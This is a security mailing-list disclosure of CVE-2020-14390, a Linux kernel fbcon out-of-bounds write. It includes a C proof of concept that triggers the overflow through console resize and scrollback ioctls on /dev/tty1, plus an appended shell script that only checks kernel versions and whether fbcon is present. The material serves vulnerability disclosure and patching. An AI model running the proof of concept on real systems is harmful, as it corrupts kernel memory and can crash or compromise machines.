Message-ID: <CAH5WSp7F86OfgeOLROT7bGwH1jkTivrHp6KOsEnsHDaEq166AQ@mail.gmail.com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
From: Minh Yuan <yuanmingbuaa@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon

Hi,

I found an out-of-bounds write in fbcon_redraw_softback in kernel
versions <= 5.9.rc5. The oldest affected kernel version is 2.2.3.
The root cause of this vulnerability is that the value of vc->vc_origin is
not updated in time while invoking vc_do_resize.

This is my PoC (it needs permission to open and write the tty, and needs
an fbcon driver to be present):

// author by ziiiro@thu
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char** argv)
{
        /* needs permission to open and write the console tty */
        int fd = open("/dev/tty1", O_RDWR, 0);
        if (fd < 0) {
                perror("open /dev/tty1");
                return 1;
        }

        /* struct vt_sizes layout: rows, cols, scrollsize */
        unsigned short size1[3] = {3, 0x21, 0};
        ioctl(fd, 0x5609, size1); // VT_RESIZE
        /* push lines into the scrollback of the 3-row console */
        for (int i = 0; i < 30; i++) {
                write(fd, "\x0a", 1);
        }

        /* subcode 13 = TIOCL_SCROLLCONSOLE, scroll back 5 lines */
        signed int args[3] = {13, -5, 0};
        ioctl(fd, 0x541c, args); // TIOCLINUX
        /* resize again while the scrollback is being displayed */
        unsigned short size2[3] = {3, 0x39, 0};
        ioctl(fd, 0x5609, size2); // VT_RESIZE
        return 0;
}


This is the commit to patch the issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489

Thanks,
Yuan Ming, Tsinghua University
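As an added triage helper, not code from this report or from the kernel project, the script below classifies a `uname -r` string against the window given above (2.2.3 up to 5.9-rc5) and checks for the sysfs node fbcon registers. It assumes the fix is present from 5.9-rc6 onwards; a distribution backport of the commit cannot be seen from the version string, so a hit only means "verify against the vendor's changelog".

```shell
#!/bin/sh
# Added triage helper for CVE-2020-14390 (not part of the original report).
# Assumption: mainline fix from 5.9-rc6 on; backports are invisible here.

# Normalise "5.9.0-rc5-generic", "5.9-rc5" or "5.8.10" into
# "MAJOR MINOR PATCH RC"; RC=999 marks a final release so that it sorts
# after every -rcN of the same base version.
ver_key() {
    rc=$(printf '%s' "$1" | sed -nE 's/^[0-9][0-9.]*-rc([0-9]+).*$/\1/p')
    [ -n "$rc" ] || rc=999
    num=$(printf '%s' "$1" | sed -E 's/^([0-9][0-9.]*).*$/\1/')
    oldifs=$IFS; IFS=.
    set -- $num
    IFS=$oldifs
    printf '%d %d %d %d' "${1:-0}" "${2:-0}" "${3:-0}" "$rc"
}

# Prints -1, 0 or 1 for a < b, a = b, a > b (field-by-field compare).
ver_cmp() {
    set -- $(ver_key "$1") $(ver_key "$2")
    for pair in "$1 $5" "$2 $6" "$3 $7" "$4 $8"; do
        set -- $pair
        [ "$1" -lt "$2" ] && { printf '%s\n' "-1"; return 0; }
        [ "$1" -gt "$2" ] && { printf '%s\n' "1"; return 0; }
    done
    printf '%s\n' "0"
}

# True when the version string lies inside the window the report gives.
cve_2020_14390_affected() {
    [ "$(ver_cmp "$1" 2.2.3)" -ge 0 ] && [ "$(ver_cmp "$1" 5.9-rc5)" -le 0 ]
}

# True when fbcon has registered its sysfs device on this host.
fbcon_present() {
    [ -d /sys/class/graphics/fbcon ]
}

triage() {
    v=$(uname -r)
    if cve_2020_14390_affected "$v"; then
        printf 'kernel %s: inside the affected window, check for a backport\n' "$v"
    else
        printf 'kernel %s: outside the affected window\n' "$v"
    fi
    if fbcon_present; then echo "fbcon: loaded"; else echo "fbcon: not loaded"; fi
}

triage
```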
